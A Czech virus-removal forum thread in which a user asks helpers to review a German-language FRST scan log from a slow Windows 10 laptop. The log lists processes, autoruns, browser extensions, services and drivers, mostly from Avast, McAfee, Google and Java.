Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Prosim o kontrolu logu. Velice dlouha odezva

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Odpovědět
Zpráva
Autor
lkcenovsky
Návštěvník
Návštěvník
Příspěvky: 5
Registrován: 11 lis 2018 22:41

Prosim o kontrolu logu. Velice dlouha odezva

#1 Příspěvek od lkcenovsky »

Doufam, ze nevadi, ze je to v nemcine...
Diky!!!!

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 11.11.2018
durchgeführt von User (Administrator) auf DESKTOP-A1GGGIV (11-11-2018 22:20:16)
Gestartet von C:\Users\User\Downloads
Geladene Profile: User (Verfügbare Profile: User)
Platform: Windows 10 Home Version 1803 17134.345 (X64) Sprache: Němčina (Německo)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(McAfee, LLC) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
(McAfee, LLC) C:\Windows\System32\mfevtps.exe
(McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\VSCore_18_5\mcapexe.exe
(McAfee, Inc.) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\2.9.175.0\McCSPServiceHost.exe
(McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\saUI.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\Office16\OfficeHubTaskHost.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.33.41.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe
() C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe\Video.UI.exe
(Realtek semiconductor) C:\Windows\RTFTrack.exe
() C:\Program Files\Google\Drive\googledrivesync.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(McAfee, Inc.) C:\Program Files\McAfee\MAT\McPvTray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
() C:\Program Files\Google\Drive\googledrivesync.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\MSM\McSmtFwk.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\msdt.exe
(Microsoft Corporation) C:\Windows\System32\sdiagnhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\sdiagnhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3242696 2016-09-07] (ELAN Microelectronics Corp.)
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [935104 2014-11-25] (Conexant Systems, Inc.)
HKLM\...\Run: [RtsFT] => C:\WINDOWS\RTFTrack.exe [9309936 2016-09-07] (Realtek semiconductor)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [242392 2018-10-24] (AVAST Software)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1830616 2014-04-10] (Conexant Systems, Inc.)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ACHTUNG
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Corporation)
HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\...\Run: [GoogleDriveSync] => C:\Program Files\Google\Drive\googledrivesync.exe [46459080 2018-10-04] ()
GroupPolicy: Beschränkung ? <==== ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{cad39d53-d09b-4d1d-a27e-f6fce36c5a7a}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05 ... earchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05 ... earchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05 ... earchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05 ... earchTerms}
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_181\bin\ssv.dll [2018-08-18] (Oracle Corporation)
BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2018-09-27] (McAfee, Inc.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-08-18] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\ssv.dll [2018-08-18] (Oracle Corporation)
BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2018-09-27] (McAfee, Inc.)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-08-18] (Oracle Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2018-09-27] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2018-09-27] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2018-06-15] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2018-06-15] (McAfee, Inc.)

FireFox:
========
FF DefaultProfile: fv1h6kzk.default
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\fv1h6kzk.default [2018-09-24]
FF Homepage: Mozilla\Firefox\Profiles\fv1h6kzk.default -> hxxp://www.bing.com/search?FORM=INCOH1&PC=IC04 ... O-5c39e9ad
FF NewTab: Mozilla\Firefox\Profiles\fv1h6kzk.default -> about:newtab
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\fv1h6kzk.default\searchplugins\bing powered search.xml [2016-09-13]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\e10ssaffplg.xpi
FF Extension: (McAfee® WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\e10ssaffplg.xpi [2018-10-18]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\e10ssaffplg.xpi
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2018-08-03] [Legacy] [ist nicht signiert]
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-08-18] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-08-18] (Oracle Corporation)
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2018-06-15] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-08-18] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-08-18] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2018-06-15] ()
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-06-18] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-06-18] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2018-05-29] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2018-05-29] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-09-20] (Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default [2018-11-11]
CHR Extension: (Prezentace) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-12]
CHR Extension: (Dokumenty) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-12]
CHR Extension: (Disk Google) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-07]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-07]
CHR Extension: (Adobe Acrobat) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-08-17]
CHR Extension: (Tabulky) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-12]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2018-10-17]
CHR Extension: (Dokumenty Google offline) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-21]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2018-08-18]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-17]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-07]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-20]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-10-28]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1 [2018-10-28]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2018-10-28]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-10-28]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-28]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2 [2018-10-28]
CHR Extension: (Prezentace) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-10-28]
CHR Extension: (Dokumenty) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-10-28]
CHR Extension: (Disk Google) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-28]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-10-28]
CHR Extension: (Adobe Acrobat) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2018-10-28]
CHR Extension: (Tabulky) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-10-28]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2018-10-28]
CHR Extension: (Dokumenty Google offline) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-10-28]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2018-10-28]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-10-28]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-10-28]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-28]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3 [2018-10-28]
CHR Extension: (Prezentace) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-10-28]
CHR Extension: (Docs) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-10-28]
CHR Extension: (Disk Google) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-28]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-10-28]
CHR Extension: (Adobe Acrobat) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2018-10-28]
CHR Extension: (Tabulky) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-10-28]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2018-10-28]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2018-10-28]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-10-28]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-10-28]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-28]
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\System Profile [2018-10-28]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\User\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx [2018-10-28]
CHR HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [8188768 2018-10-24] (AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [325024 2018-10-24] (AVAST Software)
S3 AvastWscReporter; C:\Program Files\AVAST Software\Avast\wsc_proxy.exe [57504 2018-10-24] (AVAST Software)
S3 ClientAnalyticsService; C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe [1508656 2018-05-31] (McAfee, Inc.)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [144072 2016-09-07] (ELAN Microelectronics Corp.)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [604824 2018-09-27] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_18_5\McApExe.exe [728808 2018-06-12] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\2.9.175.0\\McCSPServiceHost.exe [2141912 2018-04-06] (McAfee, Inc.)
S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe [359888 2018-04-24] (McAfee, LLC)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [519120 2018-04-24] (McAfee, LLC)
R2 mfevtp; C:\WINDOWS\system32\mfevtps.exe [473552 2018-04-24] (McAfee, LLC)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1689952 2018-06-05] (McAfee, Inc.)
R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [1047448 2018-05-30] (McAfee, Inc.)
S4 ssh-agent; C:\WINDOWS\System32\OpenSSH\ssh-agent.exe [495616 2018-03-10] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4451616 2018-04-12] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [107136 2018-09-21] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [82704 2016-09-07] (Advanced Micro Devices, Inc.)
R1 aswArPot; C:\WINDOWS\System32\drivers\aswArPot.sys [201408 2018-10-24] (AVAST Software)
R1 aswbidsdriver; C:\WINDOWS\System32\drivers\aswbidsdrivera.sys [230512 2018-10-24] (AVAST Software)
R0 aswbidsh; C:\WINDOWS\System32\drivers\aswbidsha.sys [201928 2018-10-24] (AVAST Software)
R0 aswblog; C:\WINDOWS\System32\drivers\aswbloga.sys [346760 2018-10-24] (AVAST Software)
R0 aswbuniv; C:\WINDOWS\System32\drivers\aswbuniva.sys [59664 2018-10-24] (AVAST Software)
R0 aswElam; C:\WINDOWS\System32\drivers\aswElam.sys [15360 2018-08-17] (AVAST Software)
R1 aswHdsKe; C:\WINDOWS\System32\drivers\aswHdsKe.sys [185240 2018-10-24] (AVAST Software)
S3 aswHwid; C:\WINDOWS\System32\drivers\aswHwid.sys [47064 2018-10-24] (AVAST Software)
R1 aswKbd; C:\WINDOWS\System32\drivers\aswKbd.sys [42456 2018-10-24] (AVAST Software)
R2 aswMonFlt; C:\WINDOWS\System32\drivers\aswMonFlt.sys [163376 2018-10-24] (AVAST Software)
R1 aswRdr; C:\WINDOWS\System32\drivers\aswRdr2.sys [111968 2018-10-24] (AVAST Software)
R0 aswRvrt; C:\WINDOWS\System32\drivers\aswRvrt.sys [88112 2018-10-24] (AVAST Software)
R1 aswSnx; C:\WINDOWS\System32\drivers\aswSnx.sys [1028840 2018-10-24] (AVAST Software)
R1 aswSP; C:\WINDOWS\System32\drivers\aswSP.sys [467904 2018-10-24] (AVAST Software)
R2 aswStm; C:\WINDOWS\System32\drivers\aswStm.sys [208640 2018-10-24] (AVAST Software)
R0 aswVmm; C:\WINDOWS\System32\drivers\aswVmm.sys [381144 2018-10-24] (AVAST Software)
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [111120 2016-09-07] (Advanced Micro Devices)
